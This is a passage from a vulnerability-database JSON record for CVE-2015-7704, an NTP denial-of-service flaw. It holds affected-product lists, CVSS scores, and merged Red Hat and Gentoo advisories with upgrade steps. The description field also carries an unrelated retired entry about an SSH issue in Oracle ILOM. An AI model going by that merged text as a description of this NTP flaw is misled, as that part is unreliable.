        "id": "VU#718152"
      },
      {
        "db": "BID",
        "id": "77280"
      },
      {
        "db": "BID",
        "id": "92012"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007700"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201510-585"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-7704"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:ntp:ntp:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.2.8",
                "versionStartIncluding": "4.2.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:-:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta4:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta5:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1-rc1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p1-rc2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p2-rc1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p2-rc2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p2-rc3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p3-rc1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p3-rc2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.2.8:p3-rc3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:ntp:ntp:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.3.77",
                "versionStartIncluding": "4.3.0",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:netapp:oncommand_performance_manager:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:oncommand_unified_manager:-:*:*:*:*:clustered_data_ontap:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:netapp:clustered_data_ontap:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:netapp:data_ontap:-:*:*:*:*:7-mode:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:6.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:6.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:6.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:6.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:6.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:6.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:6.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:mcafee:enterprise_security_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "10.4.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:mcafee:enterprise_security_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "11.2.0",
                "versionStartIncluding": "11.0.0",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:citrix:xenserver:6.0.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:citrix:xenserver:6.2.0:-:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:citrix:xenserver:6.5:-:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:citrix:xenserver:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2015-7704"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Aanchal Malhotra, Isaac E. Cohen, Erik Brakke, and Sharon Goldberg from Boston University",
    "sources": [
      {
        "db": "BID",
        "id": "77280"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2015-7704",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": true,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 5.0,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Partial",
            "baseScore": 5.0,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2015-7704",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.5,
            "baseSeverity": "High",
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2015-7704",
            "impactScore": null,
            "integrityImpact": "None",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2015-7704",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201510-585",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2015-7704",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2015-7704"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007700"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201510-585"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-7704"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The ntpd client in NTP 4.x before 4.2.8p4 and 4.3.x before 4.3.77 allows remote attackers to cause a denial of service via a number of crafted \"KOD\" messages. The NTP.org reference implementation of ntpd contains multiple vulnerabilities. NTP Contains an input validation vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. Network Time Protocol is prone to a denial-of-service vulnerability. \nAn attacker can leverage this issue to cause a denial-of-service condition. Oracle Integrated Lights Out Manager is prone to a remote security vulnerability in ILOM. \nThe vulnerability can be exploited over the \u0027SSH\u0027 protocol. The \u0027SSH\u0027 sub component is affected. \nThis vulnerability affects the following supported versions:\n3.0, 3.1, 3.2\nNOTE: This BID is being retired as it is a duplicate of BID 75990 (OpenSSH Login Handling Security Bypass Weakness). Summary:\n\nUpdated ntp packages that fix two security issues are now available for\nRed Hat Enterprise Linux 6 and 7. \n\nRed Hat Product Security has rated this update as having Important security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux Desktop (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, noarch, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - noarch, x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, noarch, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, noarch, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - noarch, x86_64\n\n3. \n\nIt was discovered that ntpd as a client did not correctly check timestamps\nin Kiss-of-Death packets. (CVE-2015-7704)\n\nIt was found that ntpd did not correctly implement the threshold limitation\nfor the \u0027-g\u0027 option, which is used to set the time without any\nrestrictions. A man-in-the-middle attacker able to intercept NTP traffic\nbetween a connecting client and an NTP server could use this flaw to force\nthat client to make multiple steps larger than the panic threshold,\neffectively changing the time to an arbitrary value. (CVE-2015-5300)\n\nRed Hat would like to thank Aanchal Malhotra, Isaac E. Cohen, and Sharon\nGoldberg of Boston University for reporting these issues. \n\nAll ntp users are advised to upgrade to these updated packages, which\ncontain backported patches to resolve these issues. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1271070 - CVE-2015-7704 ntp: disabling synchronization via crafted KoD packet\n1271076 - CVE-2015-5300 ntp: MITM attacker can force ntpd to make a step larger than the panic threshold\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nntp-4.2.6p5-5.el6_7.2.src.rpm\n\ni386:\nntp-4.2.6p5-5.el6_7.2.i686.rpm\nntp-debuginfo-4.2.6p5-5.el6_7.2.i686.rpm\nntpdate-4.2.6p5-5.el6_7.2.i686.rpm\n\nx86_64:\nntp-4.2.6p5-5.el6_7.2.x86_64.rpm\nntp-debuginfo-4.2.6p5-5.el6_7.2.x86_64.rpm\nntpdate-4.2.6p5-5.el6_7.2.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\ni386:\nntp-debuginfo-4.2.6p5-5.el6_7.2.i686.rpm\nntp-perl-4.2.6p5-5.el6_7.2.i686.rpm\n\nnoarch:\nntp-doc-4.2.6p5-5.el6_7.2.noarch.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-5.el6_7.2.x86_64.rpm\nntp-perl-4.2.6p5-5.el6_7.2.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nntp-4.2.6p5-5.el6_7.2.src.rpm\n\nx86_64:\nntp-4.2.6p5-5.el6_7.2.x86_64.rpm\nntp-debuginfo-4.2.6p5-5.el6_7.2.x86_64.rpm\nntpdate-4.2.6p5-5.el6_7.2.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nnoarch:\nntp-doc-4.2.6p5-5.el6_7.2.noarch.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-5.el6_7.2.x86_64.rpm\nntp-perl-4.2.6p5-5.el6_7.2.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nntp-4.2.6p5-5.el6_7.2.src.rpm\n\ni386:\nntp-4.2.6p5-5.el6_7.2.i686.rpm\nntp-debuginfo-4.2.6p5-5.el6_7.2.i686.rpm\nntpdate-4.2.6p5-5.el6_7.2.i686.rpm\n\nppc64:\nntp-4.2.6p5-5.el6_7.2.ppc64.rpm\nntp-debuginfo-4.2.6p5-5.el6_7.2.ppc64.rpm\nntpdate-4.2.6p5-5.el6_7.2.ppc64.rpm\n\ns390x:\nntp-4.2.6p5-5.el6_7.2.s390x.rpm\nntp-debuginfo-4.2.6p5-5.el6_7.2.s390x.rpm\nntpdate-4.2.6p5-5.el6_7.2.s390x.rpm\n\nx86_64:\nntp-4.2.6p5-5.el6_7.2.x86_64.rpm\nntp-debuginfo-4.2.6p5-5.el6_7.2.x86_64.rpm\nntpdate-4.2.6p5-5.el6_7.2.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\ni386:\nntp-debuginfo-4.2.6p5-5.el6_7.2.i686.rpm\nntp-perl-4.2.6p5-5.el6_7.2.i686.rpm\n\nnoarch:\nntp-doc-4.2.6p5-5.el6_7.2.noarch.rpm\n\nppc64:\nntp-debuginfo-4.2.6p5-5.el6_7.2.ppc64.rpm\nntp-perl-4.2.6p5-5.el6_7.2.ppc64.rpm\n\ns390x:\nntp-debuginfo-4.2.6p5-5.el6_7.2.s390x.rpm\nntp-perl-4.2.6p5-5.el6_7.2.s390x.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-5.el6_7.2.x86_64.rpm\nntp-perl-4.2.6p5-5.el6_7.2.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nntp-4.2.6p5-5.el6_7.2.src.rpm\n\ni386:\nntp-4.2.6p5-5.el6_7.2.i686.rpm\nntp-debuginfo-4.2.6p5-5.el6_7.2.i686.rpm\nntpdate-4.2.6p5-5.el6_7.2.i686.rpm\n\nx86_64:\nntp-4.2.6p5-5.el6_7.2.x86_64.rpm\nntp-debuginfo-4.2.6p5-5.el6_7.2.x86_64.rpm\nntpdate-4.2.6p5-5.el6_7.2.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\ni386:\nntp-debuginfo-4.2.6p5-5.el6_7.2.i686.rpm\nntp-perl-4.2.6p5-5.el6_7.2.i686.rpm\n\nnoarch:\nntp-doc-4.2.6p5-5.el6_7.2.noarch.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-5.el6_7.2.x86_64.rpm\nntp-perl-4.2.6p5-5.el6_7.2.x86_64.rpm\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nntp-4.2.6p5-19.el7_1.3.src.rpm\n\nx86_64:\nntp-4.2.6p5-19.el7_1.3.x86_64.rpm\nntp-debuginfo-4.2.6p5-19.el7_1.3.x86_64.rpm\nntpdate-4.2.6p5-19.el7_1.3.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nnoarch:\nntp-doc-4.2.6p5-19.el7_1.3.noarch.rpm\nntp-perl-4.2.6p5-19.el7_1.3.noarch.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-19.el7_1.3.x86_64.rpm\nsntp-4.2.6p5-19.el7_1.3.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nntp-4.2.6p5-19.el7_1.3.src.rpm\n\nx86_64:\nntp-4.2.6p5-19.el7_1.3.x86_64.rpm\nntp-debuginfo-4.2.6p5-19.el7_1.3.x86_64.rpm\nntpdate-4.2.6p5-19.el7_1.3.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nnoarch:\nntp-doc-4.2.6p5-19.el7_1.3.noarch.rpm\nntp-perl-4.2.6p5-19.el7_1.3.noarch.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-19.el7_1.3.x86_64.rpm\nsntp-4.2.6p5-19.el7_1.3.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nntp-4.2.6p5-19.el7_1.3.src.rpm\n\nppc64:\nntp-4.2.6p5-19.el7_1.3.ppc64.rpm\nntp-debuginfo-4.2.6p5-19.el7_1.3.ppc64.rpm\nntpdate-4.2.6p5-19.el7_1.3.ppc64.rpm\n\ns390x:\nntp-4.2.6p5-19.el7_1.3.s390x.rpm\nntp-debuginfo-4.2.6p5-19.el7_1.3.s390x.rpm\nntpdate-4.2.6p5-19.el7_1.3.s390x.rpm\n\nx86_64:\nntp-4.2.6p5-19.el7_1.3.x86_64.rpm\nntp-debuginfo-4.2.6p5-19.el7_1.3.x86_64.rpm\nntpdate-4.2.6p5-19.el7_1.3.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nntp-4.2.6p5-19.ael7b_1.3.src.rpm\n\nppc64le:\nntp-4.2.6p5-19.ael7b_1.3.ppc64le.rpm\nntp-debuginfo-4.2.6p5-19.ael7b_1.3.ppc64le.rpm\nntpdate-4.2.6p5-19.ael7b_1.3.ppc64le.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nnoarch:\nntp-doc-4.2.6p5-19.el7_1.3.noarch.rpm\nntp-perl-4.2.6p5-19.el7_1.3.noarch.rpm\n\nppc64:\nntp-debuginfo-4.2.6p5-19.el7_1.3.ppc64.rpm\nsntp-4.2.6p5-19.el7_1.3.ppc64.rpm\n\ns390x:\nntp-debuginfo-4.2.6p5-19.el7_1.3.s390x.rpm\nsntp-4.2.6p5-19.el7_1.3.s390x.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-19.el7_1.3.x86_64.rpm\nsntp-4.2.6p5-19.el7_1.3.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nnoarch:\nntp-doc-4.2.6p5-19.ael7b_1.3.noarch.rpm\nntp-perl-4.2.6p5-19.ael7b_1.3.noarch.rpm\n\nppc64le:\nntp-debuginfo-4.2.6p5-19.ael7b_1.3.ppc64le.rpm\nsntp-4.2.6p5-19.ael7b_1.3.ppc64le.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nntp-4.2.6p5-19.el7_1.3.src.rpm\n\nx86_64:\nntp-4.2.6p5-19.el7_1.3.x86_64.rpm\nntp-debuginfo-4.2.6p5-19.el7_1.3.x86_64.rpm\nntpdate-4.2.6p5-19.el7_1.3.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nnoarch:\nntp-doc-4.2.6p5-19.el7_1.3.noarch.rpm\nntp-perl-4.2.6p5-19.el7_1.3.noarch.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-19.el7_1.3.x86_64.rpm\nsntp-4.2.6p5-19.el7_1.3.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2015-5300\nhttps://access.redhat.com/security/cve/CVE-2015-7704\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2015 Red Hat, Inc. \n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory                           GLSA 201607-15\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n                                           https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n    Title: NTP: Multiple vulnerabilities\n     Date: July 20, 2016\n     Bugs: #563774, #572452, #581528, #584954\n       ID: 201607-15\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in NTP, the worst of which\ncould lead to Denial of Service. \n\nAffected packages\n=================\n\n    -------------------------------------------------------------------\n     Package              /     Vulnerable     /            Unaffected\n    -------------------------------------------------------------------\n  1  net-misc/ntp                \u003c 4.2.8_p8               \u003e= 4.2.8_p8\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in NTP. Please review the\nCVE identifiers referenced below for details. \n\nResolution\n==========\n\nAll NTP users should upgrade to the latest version:\n\n  # emerge --sync\n  # emerge --ask --oneshot --verbose \"\u003e=net-misc/ntp-4.2.8_p8\"\n\nReferences\n==========\n\n[  1 ] CVE-2015-7691\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7691\n[  2 ] CVE-2015-7692\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7692\n[  3 ] CVE-2015-7701\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7701\n[  4 ] CVE-2015-7702\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7702\n[  5 ] CVE-2015-7703\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7703\n[  6 ] CVE-2015-7704\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7704\n[  7 ] CVE-2015-7705\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7705\n[  8 ] CVE-2015-7848\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7848\n[  9 ] CVE-2015-7849\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7849\n[ 10 ] CVE-2015-7850\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7850\n[ 11 ] CVE-2015-7851\n       